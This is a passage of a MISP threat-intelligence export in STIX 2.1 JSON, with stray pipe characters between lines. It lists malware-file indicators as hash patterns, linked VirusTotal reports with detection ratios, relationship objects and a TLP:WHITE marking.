"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--d2a962b8-e9f1-4db3-a4ab-cc399560f5cd",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2018-12-23T16:55:04",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "a8e523dd-5dd6-466e-86ce-5b009edd7294"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d/analysis/1545584104/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "ce52ccac-75fd-4d28-8300-23b0f0c2682d"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "26/57",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "dfb31056-0eac-493e-a0cd-66b3ed501c0c"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--06546ec0-783e-40a7-a681-d2d25f245cf8",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'f0cccfa07427442b472a15232765a2eb' AND file:hashes.SHA1 = '6cb397aab13cdcbf0c77aea28431d81b036648ad' AND file:hashes.SHA256 = '31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--5473bd03-6e2e-435d-b979-cca55055af85",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-07T05:08:51",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "e04d799d-8aaf-4a26-88a6-8836e6095eae"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/31784de70d7b55b2ee48a9ae359f7c67c82fb9a814279e0944a9dee01ed3f756/analysis/1554613731/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "d9a1cabf-9dfb-4064-a87b-36e6bf32137f"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "34/56",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "41d13690-0b80-401c-bff5-a3a4142fced8"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--2f932e33-d889-4470-9aca-8ffd5769e055",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:34.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:34.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'dccb186234326d4bff449d4416ff6ce4' AND file:hashes.SHA1 = 'a787e2e2f2bcfef92aa5032a67f3e6efcd706cb2' AND file:hashes.SHA256 = 'f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:34Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--66a53076-8934-43d7-b983-ab73ddd29d99",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-07T05:08:46",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "9075c263-e538-4257-af4a-94d66a3923da"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221/analysis/1554613726/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "f433ead2-68ba-47c2-a043-af1ae435ca12"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "36/55",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "ef17cbe3-8b76-4c29-9210-248ede7d0e42"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--952c0e2d-e595-4f12-a5d4-25ec983c91b6",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'b94b6857ed382b66cdfbead83480ee15' AND file:hashes.SHA1 = 'b22e1b7bf6de3fb7572b26c10300309b04efb1b8' AND file:hashes.SHA256 = 'fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:35Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--d4872fd8-7dc8-47d3-85e7-6e5aebe63db6",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-04-14T08:40:00",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "99e029db-2803-42d1-97b7-cdd070ac880b"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/fd43c0abfaa6e6203e24bdb015613801f4a23894aba9586b0bdf1e70736883e5/analysis/1555231200/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "82dfb261-8353-453a-8fc5-3ec3f9129822"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "36/59",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "9b8befa3-84b0-4042-8ddd-86b454ceae2a"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--1823da6d-442b-46cf-806d-aac97de195a4",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'b83113015a0f817c4d68659d9a1e370a' AND file:hashes.SHA1 = 'ec9c669f2b8c13e94a7ba7c57ccf163c8b8cf060' AND file:hashes.SHA256 = '3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2019-04-27T08:51:35Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "file"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "x-misp-object",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "x-misp-object--b5d7ba31-66eb-4bc9-a2c8-5140d36761b8",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"labels": [
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
],
|
|
|
|
"x_misp_attributes": [
|
|
|
|
{
|
|
|
|
"type": "datetime",
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
"value": "2019-03-15T21:23:14",
|
|
|
|
"category": "Other",
|
|
|
|
"uuid": "211d0bff-f499-4d9f-9b51-f35b3784bc4b"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "link",
|
|
|
|
"object_relation": "permalink",
|
|
|
|
"value": "https://www.virustotal.com/file/3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f/analysis/1552684994/",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "bd823c0f-8191-4313-a833-5193229cf518"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "text",
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
"value": "6/55",
|
|
|
|
"category": "Payload delivery",
|
|
|
|
"uuid": "92028634-4567-407b-9470-2c3b3295062c"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--a96edda1-d092-4dd0-af57-c4ec6e515813",
|
|
|
|
"created": "2019-04-27T08:20:12.000Z",
|
|
|
|
"modified": "2019-04-27T08:20:12.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
"target_ref": "x-misp-object--ec7ab03e-c8dd-4dd2-886e-cf39dada576c"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--344620c9-c971-4ce1-966a-5b9e488737e3",
|
|
|
|
"created": "2019-04-27T08:21:20.000Z",
|
|
|
|
"modified": "2019-04-27T08:21:20.000Z",
|
|
|
|
"relationship_type": "connects-to",
|
|
|
|
"source_ref": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
"target_ref": "indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--828352e8-cc6c-461b-aa18-b2d096986df2",
|
|
|
|
"created": "2019-04-27T08:42:22.000Z",
|
|
|
|
"modified": "2019-04-27T08:42:22.000Z",
|
|
|
|
"relationship_type": "connects-to",
|
|
|
|
"source_ref": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
"target_ref": "x-misp-object--5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--14b0f5bb-f5e5-4de5-bac5-a58d90a9e163",
|
|
|
|
"created": "2019-04-27T08:21:55.000Z",
|
|
|
|
"modified": "2019-04-27T08:21:55.000Z",
|
|
|
|
"relationship_type": "connected-from",
|
|
|
|
"source_ref": "indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81",
|
|
|
|
"target_ref": "indicator--5cc410ae-1374-4513-b215-479e02de0b81"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--78d3dd0d-6663-4d17-a7cb-3983707cab4e",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
|
|
|
|
"target_ref": "x-misp-object--c584310f-cfa6-4ca0-b283-88853eff679e"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--5688cf5d-171b-401e-b6db-3ae4cd296575",
|
|
|
|
"created": "2019-04-27T08:51:35.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:35.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
|
|
|
|
"target_ref": "x-misp-object--dc71966f-e4cf-4026-a133-50090fd4b95b"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--4df963aa-df8f-441b-8691-746d3c84f53e",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--7c1420e2-b2c6-455a-ae2d-675b32ffa908",
|
|
|
|
"target_ref": "x-misp-object--67696428-f0ea-4068-b00a-f669ee50ae03"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--d1e4b811-8eb2-4771-a5e7-8bb521dccb9c",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--45275180-143d-4606-9cd3-6bc35646d412",
|
|
|
|
"target_ref": "x-misp-object--5a3041a4-6ba6-4ce5-8d08-59693a3c3703"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--00a0e852-f869-48e3-982f-fe0563bba27f",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--56c96c2d-6b60-480a-a6dd-392718a6b188",
|
|
|
|
"target_ref": "x-misp-object--b5470b5b-e9e6-4ed2-b7c3-108f1e42b227"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--428a5c1e-e690-4ab7-9299-f1c7cb62c846",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--548d726e-92df-4311-b2d7-ea098d9a2570",
|
|
|
|
"target_ref": "x-misp-object--d2a962b8-e9f1-4db3-a4ab-cc399560f5cd"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--c7e409d3-15cf-48af-9335-be17e90ba8f5",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--06546ec0-783e-40a7-a681-d2d25f245cf8",
|
|
|
|
"target_ref": "x-misp-object--5473bd03-6e2e-435d-b979-cca55055af85"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--d495eb83-bb8d-4a9b-b147-6fee2b7f77b4",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--2f932e33-d889-4470-9aca-8ffd5769e055",
|
|
|
|
"target_ref": "x-misp-object--66a53076-8934-43d7-b983-ab73ddd29d99"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--c1aa6872-94cb-4dea-86e5-9f6a72cbb392",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--952c0e2d-e595-4f12-a5d4-25ec983c91b6",
|
|
|
|
"target_ref": "x-misp-object--d4872fd8-7dc8-47d3-85e7-6e5aebe63db6"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "relationship",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "relationship--6e29b60b-1642-49e4-a253-79a672c93ce6",
|
|
|
|
"created": "2019-04-27T08:51:36.000Z",
|
|
|
|
"modified": "2019-04-27T08:51:36.000Z",
|
|
|
|
"relationship_type": "analysed-with",
|
|
|
|
"source_ref": "indicator--1823da6d-442b-46cf-806d-aac97de195a4",
|
|
|
|
"target_ref": "x-misp-object--b5d7ba31-66eb-4bc9-a2c8-5140d36761b8"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "marking-definition",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
|
|
|
|
"created": "2017-01-20T00:00:00.000Z",
|
|
|
|
"definition_type": "tlp",
|
|
|
|
"name": "TLP:WHITE",
|
|
|
|
"definition": {
|
|
|
|
"tlp": "white"
|
|
|
|
}
|
|
|
|
}
|
|
|
|
]
|
|
|
|
}
|